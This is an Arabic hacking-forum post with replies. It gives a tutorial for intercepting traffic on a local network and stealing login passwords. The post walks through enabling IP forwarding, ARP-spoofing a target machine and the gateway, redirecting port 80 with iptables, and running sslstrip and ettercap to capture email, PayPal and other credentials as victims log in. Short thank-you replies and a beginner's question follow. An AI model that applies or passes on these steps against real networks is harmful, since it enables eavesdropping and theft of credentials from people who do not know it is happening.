تخطي الـhttps & http والحصول على باسووردات المستخدمين والأدمن

السلام عليكم ورحمة الله وبركاته
مساء الخير للجميع
درسنا اليوم عن:
1- تخطي حماية الـ HTTPS
2- كسر الباسووردات المستخدمه للدخول عبر الـ HTTP
واستخدام اداه sslstrip للتجسس على الشبكه والحصول على باسوورد الإيميل وجميع الباسووردات الأخرى التي تحتوي اثناء الدخول علىHTTPS
اولا بعد الدخول بصلاحية الروت طبق الأمر التالي

   nano / etc / etter.conf  

امسح الـ # في بداية السطرين الظاهرين بالصوره
ومن ثم احفظ الجلسه ب CTRL+x ومن ثم اضغط حرف y للحفظ

ثم طبق الأمر التالي

كود:

   echo 1 > /proc / sys/ net/ ipv4/ip_forward  

ثم اطبع

كود:

   arpspoof -i wlan0 -t 192.168.1.84 192.168.1.254  

مع العلم ان

192.168.1.8= الأ بي المستهدف داخل الشبكه
192.168.1.254 = Gateway للشبكة
ستلاحظ الأتي:



افتح سيشن جديد وصلاحيتك رووت طبق الأمر التالي

كود:

   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000  

تحويل الترافيك الى بورت 10000
ثم
اطبع الأمر التالي

كود:

  
        sslstrip -a -k -f  

حين ووصول البيانات ستلاحظ ظهور المعلومات التاليه في هذه الجلسه

واترك السيشن وافتح سيشن جديده واطبع التالي

كود:

   ettercap -T -q -i wlan0  

ملاحظه تستطيع استبدال wlan0 بـ eth0 على حسب الانترفيس تبعك

الأن باقي ننتظر المحترم يفتح الايميل سواء جي ميل او ياهو او هوت ميل او باي بال او اي موقع يطلب اليوزر والباسوورد والـ HTTPS

انتهى

المصدر: :: vBspiders Professional Network ::

---

jo'd hgJhttps & http ,hgpw,g ugn fhs,,v]hj hglsjo]ldk ,hgH]lk

شكرا لك اخي

وولكن هذا بي ميتاسبلوت عملتها؟؟

موفق بإذن الله ... لك مني أجمل تحية .

شكرا لك إخي بس ياريت تنزل شرح فديو لها مفصل
ربي يعطيك العافية بالتوفيق

الف شكر لك والله يعطيك العافية

لكن عندي سؤال ............ ماهو الروت ؟

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . موفق بإذن الله ... لك مني أجمل تحية .

مكان الموضووع قسم اختراق المواقع


ينقل

شكرا و بارك الله فيك لك مني اجمل تحية